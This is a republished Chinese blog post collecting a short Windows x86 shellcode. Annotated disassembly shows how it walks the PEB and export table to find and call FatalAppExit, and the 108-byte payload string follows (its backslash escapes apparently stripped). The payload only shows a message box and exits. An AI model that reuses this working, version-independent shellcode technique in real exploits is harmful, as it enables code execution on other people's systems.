zoukankan      html  css  js  c++  java
  • shellcode搜集

    好像WINDOWS版本都行的   利用 FatalAppExit  函数 弹出对话框 然后结束  shellcode串很短

    00406032    B2 30           mov dl,0x30
    00406034    64:8B12         mov edx,dword ptr fs:[edx]
    00406037    8B52 0C         mov edx,dword ptr ds:[edx+0xC]             ; _PEB_LDR_DATA
    0040603A    8B52 1C         mov edx,dword ptr ds:[edx+0x1C]            ; InInitializationOrderModuleList 第一项
    0040603D    8B42 08         mov eax,dword ptr ds:[edx+0x8]             ; InMemoryOrderLinks
    00406040    8B72 20         mov esi,dword ptr ds:[edx+0x20]            ; FullDllName
    00406043    8B12            mov edx,dword ptr ds:[edx]                 ; InInitializationOrderModuleList 第二项
    00406045    807E 0C 33      cmp byte ptr ds:[esi+0xC],0x33
    00406049  ^ 75 F2           jnz XlastTest.0040603D
    0040604B    89C7            mov edi,eax
    0040604D    0378 3C         add edi,dword ptr ds:[eax+0x3C]            ; pe
    00406050    8B57 78         mov edx,dword ptr ds:[edi+0x78]            ; 导出表
    00406053    01C2            add edx,eax
    00406055    8B7A 20         mov edi,dword ptr ds:[edx+0x20]            ; ENT
    00406058    01C7            add edi,eax
    0040605A    31ED            xor ebp,ebp
    0040605C    8B34AF          mov esi,dword ptr ds:[edi+ebp*4]
    0040605F    01C6            add esi,eax
    00406061    45              inc ebp
    00406062    813E 46617461   cmp dword ptr ds:[esi],0x61746146          ; CMP NAME 0-3
    00406068  ^ 75 F2           jnz XlastTest.0040605C
    0040606A    817E 08 4578697>cmp dword ptr ds:[esi+0x8],0x74697845      ; 8-11
    00406071  ^ 75 E9           jnz XlastTest.0040605C                     ; FatalAppExit 函数显示一个消息框,并终止应用程序时,消息框关闭
    00406073    8B7A 24         mov edi,dword ptr ds:[edx+0x24]            ; 导出序列号数组
    00406076    01C7            add edi,eax
    00406078    66:8B2C6F       mov bp,word ptr ds:[edi+ebp*2]             ; 得到序列号
    0040607C    8B7A 1C         mov edi,dword ptr ds:[edx+0x1C]            ; EAT
    0040607F    01C7            add edi,eax
    00406081    8B7CAF FC       mov edi,dword ptr ds:[edi+ebp*4-0x4]       ; 得到函数地址
    00406085    01C7            add edi,eax                                ; get the address of FatalAppExiA
    00406087    68 64614001     push 0x1406164
    0040608C    68 4070616E     push 0x6E617040
    00406096    89E1            mov ecx,esp
    00406098    FE49 07         dec byte ptr ds:[ecx+0x7]
    0040609B    31C0            xor eax,eax
    0040609D    51              push ecx
    0040609E    50              push eax
    0040609F    FFD7            call edi

    "x31xD2xB2x30x64x8Bx12x8Bx52x0Cx8Bx52x1Cx8Bx42x08x8Bx72x20x8B"
    "x12x80x7Ex0Cx33x75xF2x89xC7x03x78x3Cx8Bx57x78x01xC2x8Bx7Ax20"
    "x01xC7x31xEDx8Bx34xAFx01xC6x45x81x3Ex46x61x74x61x75xF2x81x7E"
    "x08x45x78x69x74x75xE9x8Bx7Ax24x01xC7x66x8Bx2Cx6Fx8Bx7Ax1Cx01"
    "xC7x8Bx7CxAFxFCx01xC7x68x64x61x40x01x68x40x70x61x6Ex89xE1xFE"
    "x49x07x31xC0x51x50xFFxD7"
    //108 bytes  Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3














  • 相关阅读:
    Microsoft .NET 框架资源基础(摘自msdn)
    cache的应用
    cache应用(asp.net 2.0 + sqlserver2005 数据依赖缓存 )
    c#遍历查找指定文件
    各浏览器目前对CSS3、HTML5的支持
    一步步构建大型网站架构
    c#连接sqlserver数据库
    C#中如何判断一个字符是汉字
    c#执行DOC命令
    VS2010快捷键
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982379.html
Copyright © 2011-2022 走看看